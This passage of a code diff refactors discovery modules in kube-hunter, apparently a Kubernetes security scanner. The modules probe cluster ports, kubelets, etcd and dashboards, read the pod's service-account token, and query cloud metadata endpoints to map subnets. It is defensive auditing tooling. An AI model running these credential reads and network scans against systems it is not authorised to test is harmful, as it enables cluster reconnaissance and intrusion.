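        if len(inheritance_chain) >= 4:
            # For a technique the MRO is (technique, category, MITRECategory, object),
            # so index -3 is the category class that carries the display name.
            return f"{inheritance_chain[-3].name} // {cls.name}"

class InitialAccessCategory(MITRECategory):
    name = "Initial Access"

class ExposedSensitiveInterfacesTechnique(InitialAccessCategory):
    name = "Exposed sensitive interfaces"

print(ExposedSensitiveInterfacesTechnique.get_name())
# -> Initial Access // Exposed sensitive interfaces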
@@ -1,3 +1,4 @@
+# flake8: noqa: E402
 from . import report
 from . import discovery
 from . import hunting
11
kube_hunter/modules/discovery/__init__.py
Normal file
@@ -0,0 +1,11 @@
# flake8: noqa: E402
from . import (
    apiserver,
    dashboard,
    etcd,
    hosts,
    kubectl,
    kubelet,
    ports,
    proxy,
)
@@ -1,15 +1,20 @@
 import json
-import requests
 import logging
+import requests
 
-from ...core.types import Discovery
-from ...core.events import handler
-from ...core.events.types import OpenPortEvent, Service, Event, EventFilterBase
+from kube_hunter.core.types import Discovery
+from kube_hunter.core.events.event_handler import handler
+from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase
+
+from kube_hunter.conf import get_config
 
 KNOWN_API_PORTS = [443, 6443, 8080]
 
+logger = logging.getLogger(__name__)
+
 
 class K8sApiService(Service, Event):
     """A Kubernetes API service"""
 
     def __init__(self, protocol="https"):
         Service.__init__(self, name="Unrecognized K8s API")
         self.protocol = protocol
@@ -17,12 +22,15 @@ class K8sApiService(Service, Event):
 
 class ApiServer(Service, Event):
     """The API server is in charge of all operations on the cluster."""
 
     def __init__(self):
         Service.__init__(self, name="API Server")
         self.protocol = "https"
 
 
 class MetricsServer(Service, Event):
-    """The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server."""
+    """The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server"""
 
     def __init__(self):
         Service.__init__(self, name="Metrics Server")
         self.protocol = "https"
@@ -35,43 +43,46 @@ class ApiServiceDiscovery(Discovery):
     """API Service Discovery
     Checks for the existence of K8s API Services
     """
 
     def __init__(self, event):
         self.event = event
         self.session = requests.Session()
         self.session.verify = False
 
     def execute(self):
-        logging.debug("Attempting to discover an API service on {}:{}".format(self.event.host, self.event.port))
+        logger.debug(f"Attempting to discover an API service on {self.event.host}:{self.event.port}")
         protocols = ["http", "https"]
         for protocol in protocols:
             if self.has_api_behaviour(protocol):
                 self.publish_event(K8sApiService(protocol))
 
     def has_api_behaviour(self, protocol):
+        config = get_config()
         try:
-            r = self.session.get("{}://{}:{}".format(protocol, self.event.host, self.event.port))
-            if ('k8s' in r.text) or ('"code"' in r.text and r.status_code != 200):
+            r = self.session.get(f"{protocol}://{self.event.host}:{self.event.port}", timeout=config.network_timeout)
+            if ("k8s" in r.text) or ('"code"' in r.text and r.status_code != 200):
                 return True
         except requests.exceptions.SSLError:
-            logging.debug("{} protocol not accepted on {}:{}".format(protocol, self.event.host, self.event.port))
-        except Exception as e:
-            logging.debug("{} on {}:{}".format(e, self.event.host, self.event.port))
+            logger.debug(f"{[protocol]} protocol not accepted on {self.event.host}:{self.event.port}")
+        except Exception:
+            logger.debug(f"Failed probing {self.event.host}:{self.event.port}", exc_info=True)
 
 
 # Acts as a Filter for services, In the case that we can classify the API,
 # We swap the filtered event with a new corresponding Service to next be published
 # The classification can be regarding the context of the execution,
 # Currently we classify: Metrics Server and Api Server
 # If running as a pod:
 #     We know the Api server IP, so we can classify easily
 # If not:
 #     We determine by accessing the /version on the service.
 #     Api Server will contain a major version field, while the Metrics will not
 @handler.subscribe(K8sApiService)
 class ApiServiceClassify(EventFilterBase):
     """API Service Classifier
     Classifies an API service
     """
 
     def __init__(self, event):
         self.event = event
         self.classified = False
@@ -79,20 +90,21 @@ class ApiServiceClassify(EventFilterBase):
         self.session.verify = False
         # Using the auth token if we can, for the case that authentication is needed for our checks
         if self.event.auth_token:
-            self.session.headers.update({"Authorization": "Bearer {}".format(self.event.auth_token)})
+            self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
 
     def classify_using_version_endpoint(self):
         """Tries to classify by accessing /version. if could not access succeded, returns"""
+        config = get_config()
         try:
-            r = self.session.get("{}://{}:{}/version".format(self.event.protocol, self.event.host, self.event.port))
-            versions = r.json()
-            if 'major' in versions:
-                if versions.get('major') == "":
+            endpoint = f"{self.event.protocol}://{self.event.host}:{self.event.port}/version"
+            versions = self.session.get(endpoint, timeout=config.network_timeout).json()
+            if "major" in versions:
+                if versions.get("major") == "":
                     self.event = MetricsServer()
                 else:
                     self.event = ApiServer()
-        except Exception as e:
-            logging.error("Could not access /version on API service: {}".format(e))
+        except Exception:
+            logging.warning("Could not access /version on API service", exc_info=True)
 
     def execute(self):
         discovered_protocol = self.event.protocol
@@ -109,6 +121,6 @@ class ApiServiceClassify(EventFilterBase):
 
         # in any case, making sure to link previously discovered protocol
         self.event.protocol = discovered_protocol
         # If some check classified the Service,
         # the event will have been replaced.
         return self.event
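
As a rough standalone restatement of the /version classification heuristic above (host and port are made-up placeholders, and certificate verification is disabled just as in the classifier):

import requests

def classify_k8s_api(host="10.0.0.1", port=6443, timeout=5):
    # An API Server reports a non-empty "major" version field on /version,
    # while the Metrics Server reports an empty one. Placeholder host/port.
    versions = requests.get(f"https://{host}:{port}/version", verify=False, timeout=timeout).json()
    if "major" in versions:
        return "Metrics Server" if versions.get("major") == "" else "API Server"
    return "Unrecognized K8s API"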
44
kube_hunter/modules/discovery/dashboard.py
Normal file
@@ -0,0 +1,44 @@
import json
import logging
import requests

from kube_hunter.conf import get_config
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Event, OpenPortEvent, Service
from kube_hunter.core.types import Discovery

logger = logging.getLogger(__name__)


class KubeDashboardEvent(Service, Event):
    """A web-based Kubernetes user interface allows easy usage with operations on the cluster"""

    def __init__(self, **kargs):
        Service.__init__(self, name="Kubernetes Dashboard", **kargs)


@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
class KubeDashboard(Discovery):
    """K8s Dashboard Discovery
    Checks for the existence of a Dashboard
    """

    def __init__(self, event):
        self.event = event

    @property
    def secure(self):
        config = get_config()
        endpoint = f"http://{self.event.host}:{self.event.port}/api/v1/service/default"
        logger.debug("Attempting to discover an Api server to access dashboard")
        try:
            r = requests.get(endpoint, timeout=config.network_timeout)
            if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
                return False
        except requests.Timeout:
            logger.debug(f"failed getting {endpoint}", exc_info=True)
        return True

    def execute(self):
        if not self.secure:
            self.publish_event(KubeDashboardEvent())
@@ -1,26 +1,22 @@
 import json
 import logging
+
+from kube_hunter.core.events.event_handler import handler
+from kube_hunter.core.events.types import Event, OpenPortEvent, Service
+from kube_hunter.core.types import Discovery
 
 import requests
 
-from ...core.events import handler
-from ...core.events.types import Event, OpenPortEvent, Service
-from ...core.types import Discovery
 
 # Service:
 
 class EtcdAccessEvent(Service, Event):
-    """Etcd is a DB that stores cluster's data, it contains configuration and current state information, and might contain secrets"""
+    """Etcd is a DB that stores cluster's data, it contains configuration and current
+    state information, and might contain secrets"""
 
     def __init__(self):
         Service.__init__(self, name="Etcd")
 
 
-@handler.subscribe(OpenPortEvent, predicate= lambda p: p.port == 2379)
+@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == 2379)
 class EtcdRemoteAccess(Discovery):
     """Etcd service
     check for the existence of etcd service
     """
 
     def __init__(self, event):
         self.event = event
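
The predicate argument to handler.subscribe above gates which OpenPortEvent instances reach the discovery class; a toy stand-in (not kube-hunter's real event bus) makes the filtering visible:

class FakeOpenPortEvent:
    # Toy stand-in for kube-hunter's OpenPortEvent, for illustration only.
    def __init__(self, port):
        self.port = port

predicate = lambda p: p.port == 2379
print(predicate(FakeOpenPortEvent(2379)), predicate(FakeOpenPortEvent(8080)))
# -> True False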
423
kube_hunter/modules/discovery/hosts.py
Normal file
@@ -0,0 +1,423 @@
import json
import os
import sys
import socket
import logging
import itertools
import requests

from enum import Enum
from netaddr import IPNetwork, IPAddress, AddrFormatError

from kube_hunter.conf import get_config
from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability
from kube_hunter.core.types import Discovery, AWS, Azure, InstanceMetadataApiTechnique

logger = logging.getLogger(__name__)


class RunningAsPodEvent(Event):
    def __init__(self):
        self.name = "Running from within a pod"
        self.client_cert = self.get_service_account_file("ca.crt")
        self.namespace = self.get_service_account_file("namespace")
        self.kubeservicehost = os.environ.get("KUBERNETES_SERVICE_HOST", None)

        # if service account token was manually specified, we don't load the token file
        config = get_config()
        if config.service_account_token:
            self.auth_token = config.service_account_token
        else:
            self.auth_token = self.get_service_account_file("token")

    # Event's logical location to be used mainly for reports.
    def location(self):
        location = "Local to Pod"
        hostname = os.getenv("HOSTNAME")
        if hostname:
            location += f" ({hostname})"

        return location

    def get_service_account_file(self, file):
        try:
            with open(f"/var/run/secrets/kubernetes.io/serviceaccount/{file}") as f:
                return f.read()
        except OSError:
            pass


class AWSMetadataApi(Vulnerability, Event):
    """Access to the AWS Metadata API exposes information about the machines associated with the cluster"""

    def __init__(self, cidr):
        Vulnerability.__init__(
            self,
            AWS,
            "AWS Metadata Exposure",
            category=InstanceMetadataApiTechnique,
            vid="KHV053",
        )
        self.cidr = cidr
        self.evidence = f"cidr: {cidr}"


class AzureMetadataApi(Vulnerability, Event):
    """Access to the Azure Metadata API exposes information about the machines associated with the cluster"""

    def __init__(self, cidr):
        Vulnerability.__init__(
            self,
            Azure,
            "Azure Metadata Exposure",
            category=InstanceMetadataApiTechnique,
            vid="KHV003",
        )
        self.cidr = cidr
        self.evidence = f"cidr: {cidr}"


class HostScanEvent(Event):
    def __init__(self, pod=False, active=False, predefined_hosts=None):
        # flag to specify whether to get actual data from vulnerabilities
        self.active = active
        self.predefined_hosts = predefined_hosts or []


class HostDiscoveryHelpers:
    # generator, generating a subnet by given a cidr
    @staticmethod
    def filter_subnet(subnet, ignore=None):
        for ip in subnet:
            if ignore and any(ip in s for s in ignore):
                logger.debug(f"HostDiscoveryHelpers.filter_subnet ignoring {ip}")
            else:
                yield ip

    @staticmethod
    def generate_hosts(cidrs):
        ignore = list()
        scan = list()
        for cidr in cidrs:
            try:
                if cidr.startswith("!"):
                    ignore.append(IPNetwork(cidr[1:]))
                else:
                    scan.append(IPNetwork(cidr))
            except AddrFormatError as e:
                raise ValueError(f"Unable to parse CIDR {cidr}") from e

        return itertools.chain.from_iterable(HostDiscoveryHelpers.filter_subnet(sb, ignore=ignore) for sb in scan)


@handler.subscribe(RunningAsPodEvent)
class FromPodHostDiscovery(Discovery):
    """Host Discovery when running as pod
    Generates ip addresses to scan, based on cluster/scan type
    """

    def __init__(self, event):
        self.event = event

    def execute(self):
        config = get_config()
        # Attempt to read all hosts from the Kubernetes API
        for host in list_all_k8s_cluster_nodes(config.kubeconfig):
            self.publish_event(NewHostEvent(host=host))
        # Scan any hosts that the user specified
        if config.remote or config.cidr:
            self.publish_event(HostScanEvent())
        else:
            # Discover cluster subnets, we'll scan all these hosts
            cloud, subnets = None, list()
            if self.is_azure_pod():
                subnets, cloud = self.azure_metadata_discovery()
            elif self.is_aws_pod_v1():
                subnets, cloud = self.aws_metadata_v1_discovery()
            elif self.is_aws_pod_v2():
                subnets, cloud = self.aws_metadata_v2_discovery()

            gateway_subnet = self.gateway_discovery()
            if gateway_subnet:
                subnets.append(gateway_subnet)

            should_scan_apiserver = False
            if self.event.kubeservicehost:
                should_scan_apiserver = True
            for ip, mask in subnets:
                if self.event.kubeservicehost and self.event.kubeservicehost in IPNetwork(f"{ip}/{mask}"):
                    should_scan_apiserver = False
                logger.debug(f"From pod scanning subnet {ip}/{mask}")
                for ip in IPNetwork(f"{ip}/{mask}"):
                    self.publish_event(NewHostEvent(host=ip, cloud=cloud))
            if should_scan_apiserver:
                self.publish_event(NewHostEvent(host=IPAddress(self.event.kubeservicehost), cloud=cloud))

    def is_aws_pod_v1(self):
        config = get_config()
        try:
            # Instance Metadata Service v1
            logger.debug("From pod attempting to access AWS Metadata v1 API")
            if (
                requests.get(
                    "http://169.254.169.254/latest/meta-data/",
                    timeout=config.network_timeout,
                ).status_code
                == 200
            ):
                return True
        except requests.exceptions.ConnectionError:
            logger.debug("Failed to connect AWS metadata server v1")
        except Exception:
            logger.debug("Unknown error when trying to connect to AWS metadata v1 API")
        return False

    def is_aws_pod_v2(self):
        config = get_config()
        try:
            # Instance Metadata Service v2
            logger.debug("From pod attempting to access AWS Metadata v2 API")
            token = requests.put(
                "http://169.254.169.254/latest/api/token/",
                headers={"X-aws-ec2-metatadata-token-ttl-seconds": "21600"},
                timeout=config.network_timeout,
            ).text
            if (
                requests.get(
                    "http://169.254.169.254/latest/meta-data/",
                    headers={"X-aws-ec2-metatadata-token": token},
                    timeout=config.network_timeout,
                ).status_code
                == 200
            ):
                return True
        except requests.exceptions.ConnectionError:
            logger.debug("Failed to connect AWS metadata server v2")
        except Exception:
            logger.debug("Unknown error when trying to connect to AWS metadata v2 API")
        return False

    def is_azure_pod(self):
        config = get_config()
        try:
            logger.debug("From pod attempting to access Azure Metadata API")
            if (
                requests.get(
                    "http://169.254.169.254/metadata/instance?api-version=2017-08-01",
                    headers={"Metadata": "true"},
                    timeout=config.network_timeout,
                ).status_code
                == 200
            ):
                return True
        except requests.exceptions.ConnectionError:
            logger.debug("Failed to connect Azure metadata server")
        except Exception:
            logger.debug("Unknown error when trying to connect to Azure metadata server")
        return False

    # for pod scanning
    def gateway_discovery(self):
        """Retrieving default gateway of pod, which is usually also a contact point with the host"""
        # read the default gateway directly from /proc
        # netifaces currently does not have a maintainer. so we backported to linux support only for this cause.
        # TODO: implement WMI queries for windows support
        # https://stackoverflow.com/a/6556951
        if sys.platform in ["linux", "linux2"]:
            try:
                from pyroute2 import IPDB

                ip = IPDB()
                gateway_ip = ip.routes["default"]["gateway"]
                ip.release()
                return [gateway_ip, "24"]
            except Exception as x:
                logging.debug(f"Exception while fetching default gateway from container - {x}")
            finally:
                ip.release()
        else:
            logging.debug("Not running in a linux env, will not scan default subnet")

        return False

    # querying AWS's interface metadata api v1 | works only from a pod
    def aws_metadata_v1_discovery(self):
        config = get_config()
        logger.debug("From pod attempting to access aws's metadata v1")
        mac_address = requests.get(
            "http://169.254.169.254/latest/meta-data/mac",
            timeout=config.network_timeout,
        ).text
        logger.debug(f"Extracted mac from aws's metadata v1: {mac_address}")

        cidr = requests.get(
            f"http://169.254.169.254/latest/meta-data/network/interfaces/macs/{mac_address}/subnet-ipv4-cidr-block",
            timeout=config.network_timeout,
        ).text
        logger.debug(f"Trying to extract cidr from aws's metadata v1: {cidr}")

        try:
            cidr = cidr.split("/")
            address, subnet = (cidr[0], cidr[1])
            subnet = subnet if not config.quick else "24"
            cidr = f"{address}/{subnet}"
            logger.debug(f"From pod discovered subnet {cidr}")

            self.publish_event(AWSMetadataApi(cidr=cidr))
            return [(address, subnet)], "AWS"
        except Exception as x:
            logger.debug(f"ERROR: could not parse cidr from aws metadata api: {cidr} - {x}")

        return [], "AWS"

    # querying AWS's interface metadata api v2 | works only from a pod
    def aws_metadata_v2_discovery(self):
        config = get_config()
        logger.debug("From pod attempting to access aws's metadata v2")
        token = requests.get(
            "http://169.254.169.254/latest/api/token",
            headers={"X-aws-ec2-metatadata-token-ttl-seconds": "21600"},
            timeout=config.network_timeout,
        ).text
        mac_address = requests.get(
            "http://169.254.169.254/latest/meta-data/mac",
            headers={"X-aws-ec2-metatadata-token": token},
            timeout=config.network_timeout,
        ).text
        cidr = requests.get(
            f"http://169.254.169.254/latest/meta-data/network/interfaces/macs/{mac_address}/subnet-ipv4-cidr-block",
            headers={"X-aws-ec2-metatadata-token": token},
            timeout=config.network_timeout,
        ).text.split("/")

        try:
            address, subnet = (cidr[0], cidr[1])
            subnet = subnet if not config.quick else "24"
            cidr = f"{address}/{subnet}"
            logger.debug(f"From pod discovered subnet {cidr}")

            self.publish_event(AWSMetadataApi(cidr=cidr))

            return [(address, subnet)], "AWS"
        except Exception as x:
            logger.debug(f"ERROR: could not parse cidr from aws metadata api: {cidr} - {x}")

        return [], "AWS"

    # querying azure's interface metadata api | works only from a pod
    def azure_metadata_discovery(self):
        config = get_config()
        logger.debug("From pod attempting to access azure's metadata")
        machine_metadata = requests.get(
            "http://169.254.169.254/metadata/instance?api-version=2017-08-01",
            headers={"Metadata": "true"},
            timeout=config.network_timeout,
        ).json()
        address, subnet = "", ""
        subnets = list()
        for interface in machine_metadata["network"]["interface"]:
            address, subnet = (
                interface["ipv4"]["subnet"][0]["address"],
                interface["ipv4"]["subnet"][0]["prefix"],
            )
            subnet = subnet if not config.quick else "24"
            logger.debug(f"From pod discovered subnet {address}/{subnet}")
            subnets.append([address, subnet if not config.quick else "24"])

            self.publish_event(AzureMetadataApi(cidr=f"{address}/{subnet}"))

        return subnets, "Azure"


@handler.subscribe(HostScanEvent)
class HostDiscovery(Discovery):
    """Host Discovery
    Generates ip addresses to scan, based on cluster/scan type
    """

    def __init__(self, event):
        self.event = event

    def execute(self):
        config = get_config()
        if config.cidr:
            for ip in HostDiscoveryHelpers.generate_hosts(config.cidr):
                self.publish_event(NewHostEvent(host=ip))
        elif config.interface:
            self.scan_interfaces()
        elif len(config.remote) > 0:
            for host in config.remote:
                self.publish_event(NewHostEvent(host=host))
        elif config.k8s_auto_discover_nodes:
            for host in list_all_k8s_cluster_nodes(config.kubeconfig):
                self.publish_event(NewHostEvent(host=host))

    # for normal scanning
    def scan_interfaces(self):
        for ip in self.generate_interfaces_subnet():
            handler.publish_event(NewHostEvent(host=ip))

    # generate all subnets from all internal network interfaces
    def generate_interfaces_subnet(self, sn="24"):
        if sys.platform == "win32":
            return self.generate_interfaces_subnet_windows()
        elif sys.platform in ["linux", "linux2"]:
            return self.generate_interfaces_subnet_linux()

    def generate_interfaces_subnet_linux(self, sn="24"):
        try:
            from pyroute2 import IPRoute

            ip = IPRoute()
            for i in ip.get_addr():
                # whitelist only ipv4 ips
                if i["family"] == socket.AF_INET:
                    ipaddress = i[0].get_attr("IFA_ADDRESS")
                    # TODO: add this instead of hardcoded 24 subnet, (add a flag for full scan option)
                    # subnet = i['prefixlen']

                    # unless specified explicitly with localhost scan flag, skip localhost ip addresses
                    if not self.event.localhost and ipaddress.startswith(InterfaceTypes.LOCALHOST.value):
                        continue

                    ip_network = IPNetwork(f"{ipaddress}/{sn}")
                    for ip in ip_network:
                        yield ip
        except Exception as x:
            logging.debug(f"Exception while generating subnet scan from local interfaces: {x}")
        finally:
            ip.release()

    def generate_interfaces_subnet_windows(self, sn="24"):
        from subprocess import check_output

        local_subnets = (
            check_output(
                "powershell -NoLogo -NoProfile -NonInteractive -ExecutionPolicy bypass -Command "
                ' "& {'
                "Get-NetIPConfiguration | Get-NetIPAddress | Where-Object {$_.AddressFamily -eq 'IPv4'}"
                " | Select-Object -Property IPAddress, PrefixLength | ConvertTo-Json "
                ' "}',
                shell=True,
            )
            .decode()
            .strip()
        )
        try:
            subnets = json.loads(local_subnets)
            for subnet in subnets:
                if not self.event.localhost and subnet["IPAddress"].startswith(InterfaceTypes.LOCALHOST.value):
                    continue
                ip_network = IPNetwork(f"{subnet['IPAddress']}/{sn}")
                for ip in ip_network:
                    yield ip

        except Exception as x:
            logging.debug(f"ERROR: Could not extract interface information using powershell - {x}")


# for comparing prefixes
class InterfaceTypes(Enum):
    LOCALHOST = "127"
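
HostDiscoveryHelpers.generate_hosts above treats a leading "!" as an exclusion; a self-contained restatement of that logic with arbitrary example addresses:

import itertools
from netaddr import IPNetwork

def generate_hosts(cidrs):
    # "!" marks a subnet to skip, mirroring the helper in hosts.py above.
    ignore = [IPNetwork(c[1:]) for c in cidrs if c.startswith("!")]
    scan = [IPNetwork(c) for c in cidrs if not c.startswith("!")]
    return itertools.chain.from_iterable(
        (ip for ip in subnet if not any(ip in s for s in ignore)) for subnet in scan
    )

print(list(generate_hosts(["192.168.0.0/30", "!192.168.0.1/32"])))
# -> [IPAddress('192.168.0.0'), IPAddress('192.168.0.2'), IPAddress('192.168.0.3')]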
@@ -1,27 +1,30 @@
 
 import logging
-import subprocess
 import json
+import subprocess
 
-from ...core.types import Discovery
-from ...core.events import handler
-from ...core.events.types import HuntStarted, Event
+from kube_hunter.core.types import Discovery
+from kube_hunter.core.events.event_handler import handler
+from kube_hunter.core.events.types import HuntStarted, Event
 
+logger = logging.getLogger(__name__)
+
 
 class KubectlClientEvent(Event):
     """The API server is in charge of all operations on the cluster."""
 
     def __init__(self, version):
         self.version = version
 
     def location(self):
         return "local machine"
 
 
 # Will be triggered on start of every hunt
 @handler.subscribe(HuntStarted)
 class KubectlClientDiscovery(Discovery):
     """Kubectl Client Discovery
     Checks for the existence of a local kubectl client
     """
 
     def __init__(self, event):
         self.event = event
 
@@ -33,14 +36,14 @@ class KubectlClientDiscovery(Discovery):
             if b"GitVersion" in version_info:
                 # extracting version from kubectl output
                 version_info = version_info.decode()
-                start = version_info.find('GitVersion')
-                version = version_info[start + len("GitVersion':\"") : version_info.find("\",", start)]
+                start = version_info.find("GitVersion")
+                version = version_info[start + len("GitVersion':\"") : version_info.find('",', start)]
         except Exception:
-            logging.debug("Could not find kubectl client")
+            logger.debug("Could not find kubectl client")
         return version
 
     def execute(self):
-        logging.debug("Attempting to discover a local kubectl client")
+        logger.debug("Attempting to discover a local kubectl client")
         version = self.get_kubectl_binary_version()
         if version:
             self.publish_event(KubectlClientEvent(version=version))
@@ -1,64 +1,77 @@
 import json
 import logging
-from enum import Enum
-from ...core.types import Discovery, Kubelet
 
 import requests
 import urllib3
+from enum import Enum
 
+from kube_hunter.conf import get_config
+from kube_hunter.core.types import Discovery
+from kube_hunter.core.events.event_handler import handler
+from kube_hunter.core.events.types import OpenPortEvent, Event, Service
 
-from ...core.events import handler
-from ...core.events.types import OpenPortEvent, Vulnerability, Event, Service
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+logger = logging.getLogger(__name__)
 
 """ Services """
 
 
 class ReadOnlyKubeletEvent(Service, Event):
-    """The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes components"""
+    """The read-only port on the kubelet serves health probing endpoints,
+    and is relied upon by many kubernetes components"""
 
     def __init__(self):
         Service.__init__(self, name="Kubelet API (readonly)")
 
 
 class SecureKubeletEvent(Service, Event):
     """The Kubelet is the main component in every Node, all pod operations goes through the kubelet"""
 
     def __init__(self, cert=False, token=False, anonymous_auth=True, **kwargs):
         self.cert = cert
         self.token = token
         self.anonymous_auth = anonymous_auth
         Service.__init__(self, name="Kubelet API", **kwargs)
 
 
 class KubeletPorts(Enum):
     SECURED = 10250
     READ_ONLY = 10255
 
 
-@handler.subscribe(OpenPortEvent, predicate= lambda x: x.port == 10255 or x.port == 10250)
+@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in [10250, 10255])
 class KubeletDiscovery(Discovery):
     """Kubelet Discovery
     Checks for the existence of a Kubelet service, and its open ports
     """
 
     def __init__(self, event):
         self.event = event
 
     def get_read_only_access(self):
-        logging.debug("Passive hunter is attempting to get kubelet read access at {}:{}".format(self.event.host, self.event.port))
-        r = requests.get("http://{host}:{port}/pods".format(host=self.event.host, port=self.event.port))
+        config = get_config()
+        endpoint = f"http://{self.event.host}:{self.event.port}/pods"
+        logger.debug(f"Trying to get kubelet read access at {endpoint}")
+        r = requests.get(endpoint, timeout=config.network_timeout)
         if r.status_code == 200:
             self.publish_event(ReadOnlyKubeletEvent())
 
     def get_secure_access(self):
-        logging.debug("Attempting to get kubelet secure access")
+        logger.debug("Attempting to get kubelet secure access")
         ping_status = self.ping_kubelet()
         if ping_status == 200:
             self.publish_event(SecureKubeletEvent(secure=False))
         elif ping_status == 403:
             self.publish_event(SecureKubeletEvent(secure=True))
         elif ping_status == 401:
             self.publish_event(SecureKubeletEvent(secure=True, anonymous_auth=False))
 
     def ping_kubelet(self):
-        logging.debug("Attempting to get pod info from kubelet")
+        config = get_config()
+        endpoint = f"https://{self.event.host}:{self.event.port}/pods"
+        logger.debug("Attempting to get pods info from kubelet")
         try:
-            return requests.get("https://{host}:{port}/pods".format(host=self.event.host, port=self.event.port), verify=False).status_code
-        except Exception as ex:
-            logging.debug("Failed pinging https port 10250 on {} : {}".format(self.event.host, ex))
+            return requests.get(endpoint, verify=False, timeout=config.network_timeout).status_code
+        except Exception:
+            logger.debug(f"Failed pinging https port on {endpoint}", exc_info=True)
 
     def execute(self):
         if self.event.port == KubeletPorts.SECURED.value:
27
kube_hunter/modules/discovery/kubernetes_client.py
Normal file
@@ -0,0 +1,27 @@
import logging
import kubernetes


def list_all_k8s_cluster_nodes(kube_config=None, client=None):
    logger = logging.getLogger(__name__)
    try:
        if kube_config:
            logger.debug("Attempting to use kubeconfig file: %s", kube_config)
            kubernetes.config.load_kube_config(config_file=kube_config)
        else:
            logger.debug("Attempting to use in cluster Kubernetes config")
            kubernetes.config.load_incluster_config()
    except kubernetes.config.config_exception.ConfigException as ex:
        logger.debug(f"Failed to initiate Kubernetes client: {ex}")
        return

    try:
        if client is None:
            client = kubernetes.client.CoreV1Api()
        ret = client.list_node(watch=False)
        logger.info("Listed %d nodes in the cluster" % len(ret.items))
        for item in ret.items:
            for addr in item.status.addresses:
                yield addr.address
    except Exception as ex:
        logger.debug(f"Failed to list nodes from Kubernetes: {ex}")
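
A hypothetical call site for the function above; the kubeconfig path is only an example. Because list_all_k8s_cluster_nodes is a generator, configuration failures surface as an empty iteration rather than an exception:

for address in list_all_k8s_cluster_nodes(kube_config="/root/.kube/config"):
    print(address)  # one entry per node address reported by the cluster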
@@ -1,39 +1,43 @@
 import logging
 
 from socket import socket
-from ...core.types import Discovery
 
-from ...core.events import handler
-from ...core.events.types import NewHostEvent, OpenPortEvent
+from kube_hunter.core.types import Discovery
+from kube_hunter.core.events.event_handler import handler
+from kube_hunter.core.events.types import NewHostEvent, OpenPortEvent
 
+logger = logging.getLogger(__name__)
 default_ports = [8001, 8080, 10250, 10255, 30000, 443, 6443, 2379]
 
 
 @handler.subscribe(NewHostEvent)
 class PortDiscovery(Discovery):
     """Port Scanning
     Scans Kubernetes known ports to determine open endpoints for discovery
     """
 
     def __init__(self, event):
         self.event = event
         self.host = event.host
         self.port = event.port
 
     def execute(self):
-        logging.debug("host {0} try ports: {1}".format(self.host, default_ports))
+        logger.debug(f"host {self.host} try ports: {default_ports}")
         for single_port in default_ports:
             if self.test_connection(self.host, single_port):
-                logging.debug("Reachable port found: {0}".format(single_port))
+                logger.debug(f"Reachable port found: {single_port}")
                 self.publish_event(OpenPortEvent(port=single_port))
 
     @staticmethod
     def test_connection(host, port):
         s = socket()
         s.settimeout(1.5)
         try:
-            try:
-                success = s.connect_ex((str(host), port))
-                if success == 0:
-                    return True
-            except: pass
-            finally: s.close()
+            logger.debug(f"Scanning {host}:{port}")
+            success = s.connect_ex((str(host), port))
+            if success == 0:
+                return True
+        except Exception:
+            logger.debug(f"Failed to probe {host}:{port}")
+        finally:
+            s.close()
         return False
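
The probe above relies on socket.connect_ex, which returns 0 on a completed TCP handshake instead of raising; a standalone sketch with placeholder host and port:

from socket import socket

def is_port_open(host="127.0.0.1", port=8001, timeout=1.5):
    s = socket()
    s.settimeout(timeout)
    try:
        return s.connect_ex((host, port)) == 0  # 0 means the connect succeeded
    finally:
        s.close()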
45
kube_hunter/modules/discovery/proxy.py
Normal file
@@ -0,0 +1,45 @@
import logging
import requests

from kube_hunter.conf import get_config
from kube_hunter.core.types import Discovery
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Service, Event, OpenPortEvent

logger = logging.getLogger(__name__)


class KubeProxyEvent(Event, Service):
    """proxies from a localhost address to the Kubernetes apiserver"""

    def __init__(self):
        Service.__init__(self, name="Kubernetes Proxy")


@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
class KubeProxy(Discovery):
    """Proxy Discovery
    Checks for the existence of an open Proxy service
    """

    def __init__(self, event):
        self.event = event
        self.host = event.host
        self.port = event.port or 8001

    @property
    def accesible(self):
        config = get_config()
        endpoint = f"http://{self.host}:{self.port}/api/v1"
        logger.debug("Attempting to discover a proxy service")
        try:
            r = requests.get(endpoint, timeout=config.network_timeout)
            if r.status_code == 200 and "APIResourceList" in r.text:
                return True
        except requests.Timeout:
            logger.debug(f"failed to get {endpoint}", exc_info=True)
        return False

    def execute(self):
        if self.accesible:
            self.publish_event(KubeProxyEvent())
14
kube_hunter/modules/hunting/__init__.py
Normal file
@@ -0,0 +1,14 @@
# flake8: noqa: E402
from . import (
    aks,
    apiserver,
    capabilities,
    certificates,
    cves,
    dashboard,
    etcd,
    kubelet,
    mounts,
    proxy,
    secrets,
)
127
kube_hunter/modules/hunting/aks.py
Normal file
@@ -0,0 +1,127 @@
import os
import json
import logging
import requests

from kube_hunter.conf import get_config
from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure

logger = logging.getLogger(__name__)


class AzureSpnExposure(Vulnerability, Event):
    """The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""

    def __init__(self, container, evidence=""):
        Vulnerability.__init__(
            self,
            Azure,
            "Azure SPN Exposure",
            category=MountServicePrincipalTechnique,
            vid="KHV004",
        )
        self.container = container
        self.evidence = evidence


@handler.subscribe(ExposedPodsHandler, predicate=lambda x: x.cloud_type == "Azure")
class AzureSpnHunter(Hunter):
    """AKS Hunting
    Hunting Azure cluster deployments using specific known configurations
    """

    def __init__(self, event):
        self.event = event
